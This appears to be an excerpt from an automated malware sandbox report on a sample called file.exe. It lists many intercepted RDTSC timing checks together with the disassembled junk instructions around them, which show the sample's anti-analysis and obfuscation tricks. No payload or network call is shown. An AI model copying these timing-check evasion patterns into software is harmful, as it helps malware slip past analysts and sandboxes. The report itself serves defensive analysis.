                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74D81 second address: C74D90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F68950EC3BBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74026 second address: C7402C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C75CE2 second address: C75CE8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C76B00 second address: C76B4D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F68950E7986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F68950E7988h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 stc 0x00000028 push 00000000h 0x0000002a add ebx, dword ptr [ebp+122D2ED9h] 0x00000030 push 00000000h 0x00000032 jmp 00007F68950E7990h 0x00000037 xchg eax, esi 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74E5C second address: C74E60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C76B4D second address: C76B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C77A6D second address: C77A72 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C76D75 second address: C76D7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C78BF6 second address: C78BFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7AB0E second address: C7AB12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7AB12 second address: C7AB18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C78D15 second address: C78D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7BE35 second address: C7BEA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp], eax 0x00000008 push ecx 0x00000009 mov dword ptr [ebp+122D1CF8h], esi 0x0000000f pop ebx 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push ecx 0x00000018 pop ebx 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 mov dword ptr [ebp+122D2B20h], esi 0x00000026 mov eax, dword ptr [ebp+122D0D2Dh] 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007F68950EC3B8h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 00000019h 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 push esi 0x00000047 sub dword ptr [ebp+122D274Bh], ebx 0x0000004d pop edi 0x0000004e push FFFFFFFFh 0x00000050 mov ebx, dword ptr [ebp+122D36F1h] 0x00000056 push eax 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F68950EC3C0h 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7EE1C second address: C7EE22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7DEA5 second address: C7DEAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F68950EC3B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7DEAF second address: C7DF1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov bx, dx 0x0000000e sub dword ptr [ebp+1245E72Fh], ebx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b or bh, 00000000h 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push edx 0x00000028 call 00007F68950E7988h 0x0000002d pop edx 0x0000002e mov dword ptr [esp+04h], edx 0x00000032 add dword ptr [esp+04h], 00000017h 0x0000003a inc edx 0x0000003b push edx 0x0000003c ret 0x0000003d pop edx 0x0000003e ret 0x0000003f mov ebx, dword ptr [ebp+122D356Dh] 0x00000045 mov eax, dword ptr [ebp+122D15F9h] 0x0000004b mov bl, 61h 0x0000004d push FFFFFFFFh 0x0000004f and ebx, dword ptr [ebp+122D3755h] 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F68950E7991h 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7DF1F second address: C7DF30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950EC3BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C856B9 second address: C856DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68950E798Fh 0x00000009 jnc 00007F68950E7986h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push edi 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C85841 second address: C85847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C85847 second address: C85858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jno 00007F68950E798Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C85858 second address: C8585D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C897D2 second address: C897D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C897D6 second address: C897E0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F68950EC3B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C898B6 second address: C898C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F68950E7986h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8F9D6 second address: C8FA27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F68950EC3C2h 0x0000000e jmp 00007F68950EC3C7h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F68950EC3C8h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8FB79 second address: C8FB81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8FCA8 second address: C8FCB3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jc 00007F68950EC3B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8FE38 second address: C8FE3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8FF94 second address: C8FF98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8FF98 second address: C8FF9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8FF9E second address: C8FFB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F68950EC3BCh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8FFB0 second address: C8FFCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950E7993h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8FFCB second address: C8FFCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C90159 second address: C9015D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C902A0 second address: C902BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F68950EC3C8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C902BE second address: C902CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jo 00007F68950E7986h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C90590 second address: C90594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C90594 second address: C9059C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C975C6 second address: C975D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F68950EC3B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C975D0 second address: C975D6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C975D6 second address: C975EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F68950EC3BCh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C975EE second address: C975F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C97C47 second address: C97C51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F68950EC3B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C97C51 second address: C97C6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F68950E7992h 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C980CE second address: C980D4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C98204 second address: C98214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jp 00007F68950E7986h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C98214 second address: C9821A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9821A second address: C98228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F68950E7986h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C98228 second address: C98252 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F68950EC3B6h 0x00000008 jmp 00007F68950EC3C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 je 00007F68950EC3B6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9CD18 second address: C9CD38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F68950E7988h 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pop eax 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jbe 00007F68950E7986h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9CD38 second address: C9CD61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950EC3BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F68950EC3C6h 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9D44D second address: C9D459 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F68950E7986h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9D459 second address: C9D463 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F68950EC3B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9D57E second address: C9D599 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F68950E7990h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9D88C second address: C9D892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DF5A second address: C9DF7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F68950E7998h 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9C8BD second address: C9C8DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jne 00007F68950EC3BEh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jng 00007F68950EC3B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 ja 00007F68950EC3B6h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2AECA second address: C2AEE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950E798Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jc 00007F68950E7986h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B865 second address: C6B86F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F68950EC3B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B86F second address: C6B874 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B998 second address: C6B99C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B99C second address: C6BA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], ebx 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F68950E7988h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 ja 00007F68950E798Eh 0x0000002a push dword ptr fs:[00000000h] 0x00000031 jmp 00007F68950E7997h 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d sub dword ptr [ebp+122D285Dh], edx 0x00000043 mov edi, dword ptr [ebp+122D3169h] 0x00000049 mov dword ptr [ebp+1248D656h], esp 0x0000004f mov cx, ax 0x00000052 cmp dword ptr [ebp+122D376Dh], 00000000h 0x00000059 jne 00007F68950E79F9h 0x0000005f and edi, dword ptr [ebp+122D264Ch] 0x00000065 mov byte ptr [ebp+122D2F81h], 00000047h 0x0000006c mov eax, D49AA7D2h 0x00000071 mov dx, FD8Ah 0x00000075 mov dx, C880h 0x00000079 push eax 0x0000007a push eax 0x0000007b push edx 0x0000007c jmp 00007F68950E7997h 0x00000081 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6BF1A second address: C6BF1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C0ED second address: C6C106 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950E7995h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C106 second address: C6C10C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C10C second address: C6C11E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C11E second address: C6C133 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950EC3C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C837 second address: C6C84A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F68950E798Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C84A second address: C6C869 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F68950EC3B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+124571ECh] 0x00000013 mov dh, 44h 0x00000015 push 0000001Eh 0x00000017 xor ch, FFFFFFAAh 0x0000001a push eax 0x0000001b push ebx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6CAE8 second address: C6CAEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6CAEC second address: C6CB42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950EC3BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F68950EC3BEh 0x00000013 mov eax, dword ptr [eax] 0x00000015 push ebx 0x00000016 jmp 00007F68950EC3BFh 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jnl 00007F68950EC3B6h 0x00000029 jmp 00007F68950EC3C3h 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5B7D second address: CA5B89 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5E55 second address: CA5E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jmp 00007F68950EC3C8h 0x00000010 jmp 00007F68950EC3C1h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5E8D second address: CA5E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5E93 second address: CA5EA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950EC3BAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5FF4 second address: CA5FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5FFA second address: CA6002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6194 second address: CA619C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA619C second address: CA61AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F68950EC3BDh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA61AE second address: CA61B3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA58A second address: CAA59F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F68950EC3B6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007F68950EC3BEh 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C209C8 second address: C209F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F68950E7986h 0x0000000c popad 0x0000000d jmp 00007F68950E7997h 0x00000012 push ebx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ebx 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push esi 0x0000001e pop esi 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C209F9 second address: C209FF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C209FF second address: C20A14 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jno 00007F68950E7986h 0x00000009 pop edi 0x0000000a pushad 0x0000000b jnl 00007F68950E7986h 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA9FD7 second address: CA9FFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 jmp 00007F68950EC3C8h 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA2C9 second address: CAA2CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA2CF second address: CAA2FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F68950EC3C4h 0x0000000b push edx 0x0000000c jmp 00007F68950EC3BEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CACA19 second address: CACA1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CACA1F second address: CACA25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
